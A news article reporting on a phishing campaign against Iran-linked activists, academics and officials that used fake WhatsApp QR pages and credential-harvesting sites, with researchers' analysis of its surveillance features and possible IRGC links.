A coordinated phishing campaign targeting people involved in Iran-related activism and research has been uncovered after a UK-based Iranian activist received a suspicious WhatsApp message containing a malicious link. Technical analysis of the campaign shows it was designed to steal email and messaging credentials and, in some cases, enable surveillance by accessing victims’ location, audio, and camera data.
Warning From An Activist And Initial Discovery
On Tuesday, Nariman Gharib, an Iranian activist based in the UK, posted redacted screenshots on X showing a phishing link sent to him via WhatsApp. Gharib warned others not to click on suspicious links and said the campaign appeared to target individuals involved in Iran-related activities.
The activity comes as Iran faces the longest nationwide internet shutdown in its history, during ongoing anti-government protests and violent crackdowns. Iran and its regional adversaries are known to be active in offensive cyber operations, prompting closer examination of the campaign.
Gharib later shared the full phishing link and a technical write-up with TechCrunch, allowing reporters to obtain the source code of the phishing page used in the attack.
What The Phishing Infrastructure Revealed
Analysis of the phishing page source code, combined with input from independent security researchers, indicated the campaign was designed to steal Gmail and other online account credentials, compromise WhatsApp accounts, and potentially collect sensitive surveillance data.
The attackers used a dynamic DNS provider, DuckDNS, to host links that appeared legitimate. Dynamic DNS services allow attackers to mask the real location of servers by routing traffic through changing IP addresses tied to simple web addresses. The phishing content itself was hosted on a separate domain, alex-fabow.online, first registered in early November 2025.
Related domains hosted on the same server followed naming patterns suggesting additional targeting of online services, including virtual meeting platforms. It remains unclear whether the phishing infrastructure was shut down voluntarily or disabled by DuckDNS. The service’s owner asked that an abuse report be filed when contacted.
Exposed Server And Victim Data
A flaw in the phishing setup allowed TechCrunch to access a server-side file that stored responses from victims. The file was accessible without authentication and contained more than 850 records showing how victims interacted with the phishing flow.
The data included usernames, passwords, incorrect login attempts, and two-factor authentication codes, effectively functioning as a keylogger. It also logged user agent data, showing the campaign targeted users across Windows, macOS, iPhone, and Android devices.
The exposed records showed step-by-step credential theft, including cases where victims entered Gmail passwords multiple times until successful, followed by submission of two-factor codes sent via text message.
Identified victims included a Middle Eastern academic in national security studies, the head of an Israeli drone manufacturer, a senior Lebanese cabinet minister, at least one journalist, and individuals in or linked to the United States.
WhatsApp Account Takeover And Surveillance Features
In Gharib’s case, clicking the link opened a fake WhatsApp-themed page displaying a QR code. The page attempted to trick the victim into scanning the code, which would link their WhatsApp account to an attacker-controlled device. This method abuses WhatsApp’s legitimate device-linking feature and has previously been used against Signal users.
Security researcher Runa Sandvik, founder of Granitt, reviewed the phishing code and found it also requested browser permissions to access geolocation, microphone, and camera functions. If granted, the code would transmit real-time location data to the attacker and repeatedly update it every few seconds. The page could also capture audio recordings and photos at short intervals.
Although the code enabled these capabilities, TechCrunch did not find evidence that location data, audio, or images had been stored on the exposed server.
Who May Be Behind The Campaign
The identity of the attackers remains unclear. Fewer than 50 confirmed victims were identified, spanning activists, academics, business leaders, and officials across the Iranian diaspora and the Middle East.
Gary Miller, a researcher at Citizen Lab, said the campaign showed hallmarks associated with spearphishing operations linked to Iran’s Islamic Revolutionary Guard Corps, including targeted credential theft, abuse of messaging platforms, and international victim selection.
Other researchers noted that financially motivated cybercriminals could also use stolen credentials for fraud or data theft, though the apparent focus on location tracking and media access is unusual for purely financial crime.
Ian Campbell, a threat researcher at DomainTools, said the domains involved were registered weeks or months before the protests intensified and assessed them as medium to high risk, consistent with organized cybercrime infrastructure. He added that Iran has previously outsourced cyber operations to criminal groups to obscure state involvement.
Ongoing Risks And Broader Context
The campaign’s timing, targets, and technical design point to a high-risk environment for individuals connected to Iran-related activism and research, particularly during periods of information blackout. Researchers warned the operation could reappear using similar infrastructure.
As Miller noted, unsolicited WhatsApp links, regardless of how convincing they appear, represent a significant security risk.
Featured image credits: Pixahive
For more stories like it, click the +Follow button at the top of this page to follow us.